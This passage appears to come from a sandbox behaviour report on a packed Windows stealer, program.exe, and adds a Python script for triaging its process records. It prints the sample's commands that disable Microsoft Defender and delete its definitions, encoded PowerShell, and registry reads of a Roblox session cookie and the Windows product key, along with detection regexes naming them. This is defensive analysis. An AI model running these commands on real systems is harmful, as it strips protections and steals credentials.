kabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\program.exe  Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Users\user\Desktop\program.exe  Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
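The process-creation records above are the most reusable part of this report for detection engineering. The following is an added example and is neither Joe Sandbox code nor code from the analysed sample: it parses records of the form "Source: <parent> Process created: <child> <command line>", decodes any PowerShell -EncodedCommand argument back from base64-wrapped UTF-16LE, and applies a small rule set that maps each command line to the behaviours named in the signature list (Set-MpPreference tampering and MpCmdRun -RemoveDefinitions, execution-policy bypass with an encoded command, the password-protected rar archive, WMI hardware fingerprinting, the .ROBLOSECURITY and BackupProductKeyDefault reads). The rule names, the Finding record and the sample record set are constructed for the example; the sample records are copied from this report except for one properly cased encoded command that is built inline, because the blob as printed here is lower-cased and truncated and cannot be decoded. The decoder recognises that case from the missing null bytes that UTF-16LE places in every odd position of an ASCII script.

```python
"""Triage "Process created" records from a sandbox report.

Added example; not Joe Sandbox code and not code from the analysed sample.
Rule names, the Finding record and SAMPLE_REPORT_LINES are constructed for
the example (the lines are copied from the report, except the properly
cased encoded command built inline from SAMPLE_SCRIPT).
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# "Source: <parent>  Process created: <child> <command line>"; the separator
# between the parent path and the label may be missing in extracted text.
RECORD_RE = re.compile(
    r"Source:\s*(?P<parent>\S+?\.exe)\s*Process created:\s*"
    r"(?P<child>\S+?\.(?:exe|com))\s+(?P<cmdline>.*)$", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand
ENC_RE = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
ARCHIVE_PW_RE = re.compile(r'-hp"?([^"\s]+)', re.I)   # rar -hp<password> (header+data)

RULES = [
    ("defender_tamper", re.compile(
        r"set-mppreference.*-disable(?:realtimemonitoring|ioavprotection|"
        r"scriptscanning|intrusionpreventionsystem)\s+\$true", re.I)),
    ("defender_definitions_removed", re.compile(r"mpcmdrun\.exe.*-removedefinitions", re.I)),
    ("powershell_bypass_encoded", re.compile(
        r"-executionpolicy\s+bypass.*(?<!\S)-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("password_protected_archive", re.compile(r"\brar(?:\.exe)?\b.*\s-hp", re.I)),
    ("hw_fingerprint", re.compile(
        r"\bwmic\b.*\b(?:csproduct get uuid|computersystem get totalphysicalmemory|"
        r"os get caption|win32_videocontroller)|PROCESSOR_IDENTIFIER", re.I)),
    ("roblox_cookie_theft", re.compile(r"\.ROBLOSECURITY", re.I)),
    ("product_key_read", re.compile(r"BackupProductKeyDefault", re.I)),
    ("host_recon", re.compile(r"^(?:tasklist|getmac|tree)\b", re.I)),
    # only ever matches inside a decoded script, never a raw command line
    ("screenshot_capture", re.compile(r"CopyFromScreen|AllScreens", re.I)),
]


@dataclass
class Finding:
    parent: str
    child: str
    cmdline: str
    tags: List[str]
    decoded: Optional[str] = None
    archive_password: Optional[str] = None


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand blob (base64 of UTF-16LE). Returns None when the
    blob is unusable: bad alphabet, or case-mangled/truncated output such as
    the lower-cased blob printed in this report. An ASCII script encoded as
    UTF-16LE has a NUL in every odd byte; a decode without them is garbage."""
    blob = blob[: len(blob) // 4 * 4]          # drop a trailing partial group
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    if len(raw) < 2:
        return None
    nulls = sum(1 for b in raw[1::2] if b == 0)
    if nulls < 0.9 * (len(raw) // 2):
        return None
    return raw.decode("utf-16-le", errors="replace")


def parse_record(line: str):
    m = RECORD_RE.search(line)
    if not m:
        return None
    return m.group("parent"), m.group("child"), m.group("cmdline").strip()


def triage(lines) -> List[Finding]:
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        parent, child, cmdline = rec
        tags, decoded = set(), None
        enc = ENC_RE.search(cmdline)
        if enc:
            decoded = decode_encoded_command(enc.group(1))
            tags.add("encoded_command" if decoded else "encoded_command_undecodable")
        for tag, pattern in RULES:
            if pattern.search(cmdline) or (decoded and pattern.search(decoded)):
                tags.add(tag)
        pw = ARCHIVE_PW_RE.search(cmdline) if "password_protected_archive" in tags else None
        findings.append(Finding(parent, child, cmdline, sorted(tags), decoded,
                                pw.group(1) if pw else None))
    return findings


def summarize(findings) -> dict:
    counts = {}
    for f in findings:
        for t in f.tags:
            counts[t] = counts.get(t, 0) + 1
    return counts


# Constructed, properly cased encoded command so the decode path is exercised.
SAMPLE_SCRIPT = ("Add-Type -AssemblyName System.Windows.Forms,System.Drawing; "
                 "foreach ($s in [Windows.Forms.Screen]::AllScreens) { "
                 "$b = New-Object Drawing.Bitmap $s.Bounds.Width, $s.Bounds.Height; "
                 "[Drawing.Graphics]::FromImage($b).CopyFromScreen("
                 "$s.Bounds.Location, [Drawing.Point]::Empty, $s.Bounds.Size) }")
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
PS_PREFIX = (r"Source: C:\Windows\System32\cmd.exe  Process created: "
             r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ")

SAMPLE_REPORT_LINES = [   # copied from the report; the first keeps the fused "exeProcess" form
    r"Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86",
    r"Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST",
    r"Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\getmac.exe getmac",
    r"Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tree.com tree /A /F",
    PS_PREFIX + r"powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",
    r'Source: C:\Windows\System32\cmd.exe  Process created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *',
    r"Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid",
    PS_PREFIX + r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",
    r'Source: C:\Users\user\Desktop\program.exe  Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"',
    PS_PREFIX + r"powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend",
    PS_PREFIX + r"powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqak",
    PS_PREFIX + r"powershell.exe -noprofile -executionpolicy bypass -encodedcommand " + SAMPLE_BLOB,
]

if __name__ == "__main__":
    for f in triage(SAMPLE_REPORT_LINES):
        print(f.child.rsplit("\\", 1)[-1], f.tags, f.archive_password or "")
    print(summarize(triage(SAMPLE_REPORT_LINES)))
```

The rules are deliberately narrow to the strings on this page; in a SIEM the same shapes would be expressed against Sysmon event 1 or 4688 command lines, and the decoded script, not the blob, is what the screenshot rule should see.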
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe  Code function: 83_2_00007FF64FE9B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 83_2_00007FF64FE9B340
              Source: C:\Users\user\Desktop\program.exe  Code function: 0_2_00007FF6B7529570 cpuid 0_2_00007FF6B7529570
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\Desktop\program.exe VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pyd VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd VolumeInformation
              Source: C:\Users\user\Desktop\program.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd VolumeInformation
              (119 "Queries volume information" entries in the report, all from program.exe and all against the ten targets above; repeats are not listed)
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
